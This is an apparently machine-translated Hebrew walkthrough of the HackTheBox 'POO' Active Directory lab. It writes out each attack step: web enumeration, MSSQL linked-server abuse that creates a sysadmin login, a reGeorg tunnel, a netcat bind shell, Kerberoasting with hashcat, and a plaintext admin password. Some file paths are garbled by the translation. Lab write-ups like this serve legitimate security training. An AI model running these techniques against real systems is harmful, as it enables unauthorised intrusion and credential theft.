HackTheBoxendgame. מעבר המעבדה מבצעים התקפיים מקצועיים. Pentest Active Directory

במאמר זה ננתח את המעבר של לא רק מכונה, אלא מיני מעבדה שלמה מהאתר HackTheBox.

כפי שצוין בתיאור, POO נועד לבדוק מיומנויות בכל שלבי ההתקפות בסביבת Active Directory קטנה. המטרה היא לסכן מארח זמין, להסלים הרשאות, ובסופו של דבר לסכן את כל הדומיין על ידי איסוף 5 דגלים בתהליך.

החיבור למעבדה הוא באמצעות VPN. מומלץ לא להתחבר ממחשב עובד או מארח שיש בו נתונים חשובים עבורכם, מכיוון שאתם נכנסים לרשת פרטית עם אנשים שיודעים משהו על אבטחת מידע 🙂

מידע ארגוני
כדי לעזור לך להישאר מעודכן במאמרים חדשים, תוכנות ומידע אחר, יצרתי ערוץ מברק и קבוצה לדון בכל נושא באזור IIKB. גם הבקשות האישיות, השאלות, ההצעות וההמלצות שלך אני אסתכל ואענה לכולם..

כל המידע ניתן למטרות חינוכיות בלבד. מחבר מסמך זה אינו נושא באחריות לכל נזק שייגרם לאיש כתוצאה משימוש בידע ובשיטות שהושגו כתוצאה מעיון במסמך זה.

מבוא

משחק הקצה הזה מורכב משתי מכונות ומכיל 5 דגלים.

ניתן גם תיאור וכתובת של המארח הזמין.

בואו נתחיל!

דגל ריקון

למחשב הזה יש כתובת IP של 10.13.38.11 שאותה אני מוסיף ל-/etc/hosts.
10.13.38.11 poo.htb

השלב הראשון הוא סריקת יציאות פתוחות. מכיוון שלוקח הרבה זמן לסרוק את כל הפורטים עם nmap, אני אעשה את זה קודם כל עם masscan. אנו סורקים את כל יציאות ה-TCP וה-UDP מממשק tun0 ב-500 עמודים לשנייה.

sudo masscan -e tun0 -p1-65535,U:1-65535 10.13.38.11 --rate=500

כעת, כדי לקבל מידע מפורט יותר על השירותים הפועלים על הפורטים, בואו נריץ סריקה עם אפשרות -A.

nmap -A poo.htb -p80,1433

לפיכך, יש לנו שירותי IIS ו-MSSQL. במקרה זה, נגלה את שם ה-DNS האמיתי של הדומיין והמחשב. בשרת האינטרנט, מקבל את פנינו עמוד הבית של IIS.

בואו נעבור על המדריכים. אני משתמש בגובאסטר בשביל זה. בפרמטרים אנו מציינים את מספר הזרמים 128 (-t), URL (-u), מילון (-w) והרחבות שמעניינים אותנו (-x).

gobuster dir -t 128 -u poo.htb -w /usr/share/seclists/Discovery/Web-Content/raft-large-words.txt -x php,aspx,html

לפיכך, יש לנו אימות HTTP עבור ספריית /admin, כמו גם את קובץ האחסון של שירות שולחן העבודה DS_Store זמין. DS_Store הם קבצים המאחסנים הגדרות משתמש עבור תיקיה, כגון רשימת קבצים, מיקום אייקונים, תמונת רקע שנבחרה. קובץ כזה עלול להגיע לספריית שרת האינטרנט של מפתחי אתרים. כך, אנו מקבלים מידע על תוכן המדריך. בשביל זה אתה יכול להשתמש סורק DS_Store.

python3 dsstore_crawler.py -i http://poo.htb/

אנו מקבלים את תוכן המדריך. הדבר המעניין ביותר כאן הוא ספריית /dev, ממנה אנו יכולים לראות את המקורות וקבצי db בשני ענפים. אבל אנחנו יכולים להשתמש ב-6 התווים הראשונים של שמות הקבצים והספריות אם השירות פגיע ל- IIS ShortName. אתה יכול לבדוק את הפגיעות הזו באמצעות סורק שמות קצרים של IIS.

ואנחנו מוצאים קובץ טקסט אחד שמתחיל ב-"poo_co". לא ידעתי מה לעשות הלאה, פשוט בחרתי ממילון המדריכים את כל המילים שמתחילות ב-"co".

cat /usr/share/seclists/Discovery/Web-Content/raft-large-words.txt | grep -i "^co" > co_words.txt

ותחזרי עם wfuzz.

wfuzz -w ./co_words.txt -u "http://poo.htb/dev/dca66d38fd916317687e1390a420c3fc/db/poo_FUZZ.txt" --hc 404

ולמצוא את המילה הנכונה! אנו מסתכלים על הקובץ הזה, שומרים את האישורים (אם לשפוט לפי הפרמטר DBNAME, הם מ-MSSQL).

אנחנו מוסרים את הדגל, ומתקדמים ב-20%.

הא דגל

אנחנו מתחברים ל-MSSQL, אני משתמש ב-DBeaver.

אנחנו לא מוצאים משהו מעניין במסד הנתונים הזה, בואו ניצור עורך SQL ונבדוק מהם המשתמשים.

SELECT name FROM master..syslogins;

יש לנו שני משתמשים. בואו נבדוק את ההרשאות שלנו.

SELECT is_srvrolemember('sysadmin'), is_srvrolemember('dbcreator'), is_srvrolemember('bulkadmin'), is_srvrolemember('diskadmin'), is_srvrolemember('processadmin'), is_srvrolemember('serveradmin'), is_srvrolemember('setupadmin'), is_srvrolemember('securityadmin');

לפיכך, אין הרשאות. בוא נראה את השרתים המקושרים, כתבתי על הטכניקה הזו בפירוט כאן.

SELECT * FROM master..sysservers;

אז אנחנו מוצאים SQL Server אחר. בואו נבדוק את ביצוע הפקודות בשרת זה באמצעות openquery().

SELECT version FROM openquery("COMPATIBILITYPOO_CONFIG", 'select @@version as version');

ואנחנו אפילו יכולים לבנות עץ שאילתות.

SELECT version FROM openquery("COMPATIBILITYPOO_CONFIG", 'SELECT version FROM openquery("COMPATIBILITYPOO_PUBLIC", ''select @@version as version'');');

העובדה היא שכאשר אנו מגישים בקשה לשרת מקושר, הבקשה מבוצעת בהקשר של משתמש אחר! בוא נראה איזה הקשר משתמש אנחנו מריצים בשרת המקושר.

SELECT name FROM openquery("COMPATIBILITYPOO_CONFIG", 'SELECT user_name() as name');

ועכשיו נראה באיזה הקשר מבוצעת הבקשה מהשרת המקושר לשלנו!

SELECT * FROM openquery("COMPATIBILITYPOO_CONFIG", 'SELECT name FROM openquery("COMPATIBILITYPOO_PUBLIC", ''SELECT user_name() as name'');');

לפיכך, זהו הקשר DBO שחייב לקבל את כל ההרשאות. בואו נבדוק את ההרשאות במקרה של בקשה משרת מקושר.

SELECT * FROM openquery("COMPATIBILITYPOO_CONFIG", 'SELECT * FROM openquery("COMPATIBILITYPOO_PUBLIC", ''SELECT is_srvrolemember(''''sysadmin''''), is_srvrolemember(''''dbcreator''''), is_srvrolemember(''''bulkadmin''''), is_srvrolemember(''''diskadmin''''), is_srvrolemember(''''processadmin''''), is_srvrolemember(''''serveradmin''''), is_srvrolemember(''''setupadmin''''), is_srvrolemember(''''securityadmin'''')'')');

כפי שאתה יכול לראות, יש לנו את כל ההרשאות! בואו ניצור את המנהל שלנו ככה. אבל הם לא נותנים להם לעבור openquery, בואו נעשה את זה דרך EXECUTE AT.

EXECUTE('EXECUTE(''CREATE LOGIN [ralf] WITH PASSWORD=N''''ralfralf'''', DEFAULT_DATABASE=[master], CHECK_EXPIRATION=OFF, CHECK_POLICY=OFF'') AT "COMPATIBILITYPOO_PUBLIC"') AT "COMPATIBILITYPOO_CONFIG";
EXECUTE('EXECUTE(''CREATE USER [ralf] FOR LOGIN [ralf]'') AT "COMPATIBILITYPOO_PUBLIC"') AT "COMPATIBILITYPOO_CONFIG";
EXECUTE('EXECUTE(''ALTER SERVER ROLE [sysadmin] ADD MEMBER [ralf]'') AT "COMPATIBILITYPOO_PUBLIC"') AT "COMPATIBILITYPOO_CONFIG";
EXECUTE('EXECUTE(''ALTER ROLE [db_owner] ADD MEMBER [ralf]'') AT "COMPATIBILITYPOO_PUBLIC"') AT "COMPATIBILITYPOO_CONFIG";

ועכשיו אנחנו מתחברים עם האישורים של המשתמש החדש, צפו במסד הנתונים החדש של הדגלים.

אנחנו מוסרים את הדגל הזה והולכים רחוק יותר.

דגל חזרה לאחור

בוא נשיג את המעטפת באמצעות MSSQL, אני משתמש ב-mssqlclient מחבילת impacket.

mssqlclient.py ralf:[email protected] -db POO_PUBLIC

אנחנו צריכים להשיג סיסמאות, והדבר הראשון שכבר פגשנו הוא האתר. לפיכך, אנו זקוקים לתצורת שרת אינטרנט (אי אפשר לזרוק מעטפת נוחה, ככל הנראה חומת האש עובדת).

אבל הגישה נדחתה. למרות שאנחנו יכולים לקרוא את הקובץ מ-MSSQL, אנחנו רק צריכים לדעת אילו שפות תכנות מוגדרות. ובספריית MSSQL אנחנו מגלים שיש Python.

אז אין בעיה לקרוא את הקובץ web.config.

EXEC sp_execute_external_script
@language = N'Python',
@script = "print(open('C:inetpubwwwrootweb.config').read())"

עם האישורים שנמצאו, עבור אל /admin והרים את הדגל.

דגל דריסת רגל

למעשה, ישנן כמה אי נוחות משימוש בחומת אש, אך בהסתכלות על הגדרות הרשת, אנו מבחינים כי נעשה שימוש גם בפרוטוקול IPv6!

בואו נוסיף את הכתובת הזו ל-/etc/hosts.
dead:babe::1001 poo6.htb
בואו נסרוק את המארח שוב, אבל הפעם באמצעות IPv6.

ושירות WinRM זמין באמצעות IPv6. בואו נתחבר עם האישורים שנמצאו.

יש דגל על ​​שולחן העבודה, מסור אותו.

דגל P00ned

לאחר סיור על המארח עם חומוס אנחנו לא מוצאים שום דבר מיוחד. ואז הוחלט לחפש שוב אישורים (כתבתי גם על הנושא הזה מאמר). אבל לא הצלחתי לקבל את כל ה-SPNs מהמערכת דרך WinRM.

setspn.exe -T intranet.poo -Q */*

בוא נבצע את הפקודה באמצעות MSSQL.

בדרך זו, אנו מקבלים את ה-SPN של המשתמשים p00_hr ו-p00_adm, מה שאומר שהם פגיעים להתקפה כגון Kerberoasting. בקיצור, אנחנו יכולים לקבל את ה-hash של הסיסמאות שלהם.

ראשית עליך לקבל מעטפת יציבה מטעם משתמש MSSQL. אבל מכיוון שאנו מוגבלים בגישה, יש לנו קשר עם המארח רק דרך יציאות 80 ו-1433. אבל אפשר להעביר תנועה דרך נמל 80! בשביל זה אנחנו משתמשים הבקשה הבאה. בואו נעלה את הקובץ tunnel.aspx לספריית הבית של שרת האינטרנט - C: inetpubwwwroot.

אך כאשר אנו מנסים לגשת אליו, אנו מקבלים שגיאה 404. משמעות הדבר היא שקבצי *.aspx אינם מבוצעים. כדי להפעיל קבצים עם הרחבות אלה, התקן את ASP.NET 4.5 באופן הבא.

dism /online /enable-feature /all /featurename:IIS-ASPNET45

ועכשיו, כאשר ניגשים לtunnel.aspx, אנו מקבלים את התשובה שהכל מוכן לפעולה.

בואו נתחיל את חלק הלקוח של האפליקציה, שיעביר תעבורה. נעביר את כל התעבורה מיציאה 5432 לשרת.

python ./reGeorgSocksProxy.py -p 5432 -u http://poo.htb/tunnel.aspx

ואנחנו משתמשים ב-proxychains כדי לשלוח את התעבורה של כל יישום דרך ה-proxy שלנו. בואו נוסיף את ה-proxy הזה לקובץ התצורה /etc/proxychains.conf.

כעת נעלה את התוכנית לשרת netcat, שאיתו נכין מעטפת כריכה יציבה, ואת התסריט הפעל את Kerberoast, שאיתו נבצע את מתקפת ה-Kerberoasting.

כעת, באמצעות MSSQL, אנו משיקים את המאזין.

xp_cmdshell C:tempnc64.exe -e powershell.exe -lvp 4321

ואנחנו מתחברים דרך ה-proxy שלנו.

proxychains rlwrap nc poo.htb 4321

ובואו נשיג את הגיבובים.

. .Invoke-Kerberoast.ps1
Invoke-Kerberoast -erroraction silentlycontinue -OutputFormat Hashcat | Select-Object Hash | Out-File -filepath 'C:tempkerb_hashes.txt' -Width 8000
type kerb_hashes.txt

לאחר מכן, עליך לחזור על הגיבובים הללו. מכיוון שלא היה ל-rockyou מילון נתוני סיסמאות, השתמשתי בכל מילוני הסיסמאות שסופקו ב-Seclists. לספירה אנו משתמשים ב-hashcat.

hashcat -a 0 -m 13100 krb_hashes.txt /usr/share/seclists/Passwords/*.txt --force

ואנחנו מוצאים את שתי הסיסמאות, הראשונה במילון dutch_passwordlist.txt, והשנייה ב-Keyboard-Combinations.txt.

אז יש לנו שלושה משתמשים, אנחנו הולכים לבקר התחום. בוא נגלה קודם את כתובתו.

מצוין, למדנו את כתובת ה-IP של בקר התחום. בואו לגלות את כל המשתמשים של הדומיין, כמו גם מי מהם הוא מנהל. כדי להוריד את הסקריפט כדי לקבל מידע PowerView.ps1. לאחר מכן נתחבר באמצעות evil-winrm, ונציין את הספרייה עם הסקריפט בפרמטר -s. ואז פשוט טען את הסקריפט של PowerView.

כעת יש לנו גישה לכל הפונקציות שלו. המשתמש p00_adm נראה כמו משתמש מיוחס, אז נעבוד בהקשר שלו. בואו ניצור אובייקט PSCredential עבור משתמש זה.

$User = 'p00_adm'
$Password = 'ZQ!5t4r'
$Cpass = ConvertTo-SecureString -AsPlainText $Password -force
$Creds = New-Object System.Management.Automation.PSCredential -ArgumentList $User,$Cpass

כעת כל פקודות Powershell שבהן אנו מציינים Creds יבוצעו מטעם p00_adm. בואו נציג רשימה של משתמשים ואת התכונה AdminCount.

Get-NetUser -DomainController dc -Credential $Creds | select name,admincount

וכך, המשתמש שלנו הוא באמת מיוחס. בוא נראה לאיזה קבוצות הוא משתייך.

Get-NetGroup -UserName "p00_adm" -DomainController dc -Credential $Creds

לבסוף אנו מאשרים שהמשתמש הוא מנהל דומיין. זה נותן לו את הזכות להיכנס מרחוק לבקר התחום. בואו ננסה להיכנס עם WinRM באמצעות המנהרה שלנו. הייתי מבולבל מהשגיאות שהוציא reGeorg בעת השימוש ב-evil-winrm.

ואז אנחנו משתמשים באחד אחר, קל יותר, תַסרִיט כדי להתחבר ל-WinRM. פתח ושנה פרמטרים של חיבור.

אנחנו מנסים להתחבר, ואנחנו במערכת.

אבל אין דגל. לאחר מכן הסתכל על המשתמש ובדוק את שולחן העבודה.

ב-mr3ks אנו מוצאים את הדגל והמעבדה הושלמה ב-100%.

זה הכל. כמשוב, הגיבו אם למדתם משהו חדש מהמאמר הזה והאם הוא היה שימושי עבורכם.

אתה יכול להצטרף אלינו ב מברק. שם תוכלו למצוא חומרים מעניינים, קורסים ממוזגים וגם תוכנות. בואו נאסוף קהילה בה יהיו אנשים שמבינים בהרבה תחומי IT, ואז נוכל תמיד לעזור אחד לשני בכל נושא IT ואבטחת מידע.

מקור: www.habr.com